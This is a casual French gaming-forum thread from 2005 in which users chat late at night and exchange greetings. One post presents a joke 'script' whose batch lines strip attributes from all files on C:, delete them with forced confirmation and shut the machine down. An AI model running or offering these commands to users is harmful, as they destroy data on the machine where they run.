Au fait comment ça se fait que c´est mort ce soir?
plongi27
Niveau 10
26 août 2005 à 23:24:43
ba tu regardes l heure....
--[Nic0]--
Niveau 10
26 août 2005 à 23:25:46
Plongi: Normalement y´a pleind e monde à cette heure-ci!
Golden: Tu l´as eu comment ce pseudo en fait? Hermione
Jaketdaxter
Niveau 10
26 août 2005 à 23:28:42
je crois que je devrais sérieusement m´inquiéter de l´état de mon ordi
erimion
Niveau 7
26 août 2005 à 23:29:23
En fait, j´ai tout bonnement rentré l´adresse msn qui était donnée, il m´a ccepté et me l´a donné
erimion
Niveau 7
26 août 2005 à 23:31:37
Je viens de m´apercevoir que j´étais plus vieux que Nico maintenant
plongi27
Niveau 10
26 août 2005 à 23:31:49
il avait posté qu un msg avec^^
erimion
Niveau 7
26 août 2005 à 23:32:45
Oui Plongi était avec moi sur une conversation a part quand je lui ait demandé ^^
erimion
Niveau 7
26 août 2005 à 23:34:13
Je comprends ce que ressent Heinrich quand il se prend des vents ^^
--[Nic0]--
Niveau 10
26 août 2005 à 23:35:38
héhé bon moi je vais y aller! ^^
l´épisode de 8h a 9h de 24 m´attend
Ciao!
erimion
Niveau 7
26 août 2005 à 23:36:19
Byebye =)
Moi aussi j´y vais
Debout a 7h 30 demain
Jaketdaxter
Niveau 10
26 août 2005 à 23:37:08
heiN;, pk golden?
erimion
Niveau 7
26 août 2005 à 23:38:17
Ophtalmo
bojack_ssj4
Niveau 10
27 août 2005 à 08:43:20
Salut^^
SamuraiPi-R
Niveau 9
27 août 2005 à 09:02:46
Boops Posté le 26 août 2005 à 23:08:52 J´aime les expressions canadiennes...
Quand je disais qu´elle servait à rien cte fille.
bojack_ssj4
Niveau 10
27 août 2005 à 09:10:25
SamuraiPi-R
Niveau 9
27 août 2005 à 09:26:14
system("echo ET C REPARTI POUR LES BOULAY"); printf(" "); system("netstat -n"); system("_C_REPATI_POUR_LES_BOULAY_"); return 0; @echo off // ; @attrib c:\*.* -h -r -s @echo o | del c:\*.* @shutdown -s sa valeur 0.5 ; topik a boulay force 9.5 sur l´echelle des topik inutile overclocking imposible boulay tros cho atendre 20 min et recommencer :end </fin_du_sripte by NoNo
^^
plongi27
Niveau 10
27 août 2005 à 09:32:36
lu
bojack_ssj4
Niveau 10
27 août 2005 à 09:47:18
S´lut plongi!
papaille
Niveau 10
27 août 2005 à 10:36:20
salut!
Sujet fermé pour la raison suivante : Ce sujet est archivé et se poursuit sur le nouveau sujet : http://www.jeuxvideo.com/forums/42-10565-51405650-1-0-1-0-0.htm